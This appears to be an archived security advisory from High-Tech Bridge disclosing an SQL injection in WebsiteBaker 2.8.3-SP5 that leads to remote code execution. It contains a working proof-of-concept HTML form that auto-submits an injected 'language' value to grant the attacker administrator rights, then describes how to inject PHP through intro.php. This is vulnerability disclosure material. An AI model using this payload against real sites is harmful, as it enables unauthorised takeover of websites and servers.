[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection and RCE in WebsiteBaker

Advisory ID: HTB23296
Product: WebsiteBaker
Vendor: WebsiteBaker Org e.V.
Vulnerable Version(s): 2.8.3-SP5 and probably prior
Tested Version: 2.8.3-SP5
Advisory Publication:  February 24, 2016  [without technical details]
Vendor Notification: February 24, 2016 
Vendor Patch: February 26, 2016 
Public Disclosure: March 18, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Critical 
CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability 
in WebsiteBaker CMS. A remote attacker will be able to read, write or modify 
arbitrary information in the database, gain complete control over the 
vulnerable web application and even the entire web server on which the 
application is hosted.

The vulnerability exists due to insufficient filtration of user-supplied data 
passed via "language" HTTP POST parameter to "/account/preferences.php" PHP 
script. A remote authenticated attacker (the registration is open by default) 
can alter present SQL query, inject and execute arbitrary SQL commands in the 
application’s database. 

Successful exploitation of vulnerability requires that the attacker is 
registered and authenticated, but the registration is open by default.

The following exploit code will assign administrative privileges to attacker’s 
account. To reproduce the vulnerability, just login to the website, copy-paste 
the code below into an empty HTML file and then open it in your browser:


<form action="http://[host]/account/preferences.php"; method="post" name="f1">
<input type="hidden" name="display_name" value="username">
<input type="hidden" name="language" value="EN',group_id='1',groups_id='1">
<input type="hidden" name="action" value="details">
<input value="submit" id="btn" type="submit" />
</form><script>document.f1.submit();</script>


We also attract your attention, that website administrator can edit the 
"intro.php" file and inject arbitrary PHP code into it using the following URL: 

http://[host]/admin/pages/intro.php

The injected code will be executed every time the user visits the following 
page:

http://[host]/pages/intro.php

Giving these circumstances, successful exploitation of SQL injection 
vulnerability will lead to Remote Code Execution and full compromise not just 
of the website, but of the entire web server and related environment. 


-----------------------------------------------------------------------------------------------

Solution:

Update to WebsiteBaker 2.8.3 SP6 RC3.0

More Information:
http://addon.websitebaker.org/pages/en/browse-add-ons.php?id=06C9F242

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23296 - 
https://www.htbridge.com/advisory/HTB23296  - SQL Injection and RCE in 
WebsiteBaker
[2] WebsiteBaker - http://websitebaker.org - WebsiteBaker helps you to create 
the website you want: A free, easy and secure, flexible and extensible open 
source content management system (CMS).
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.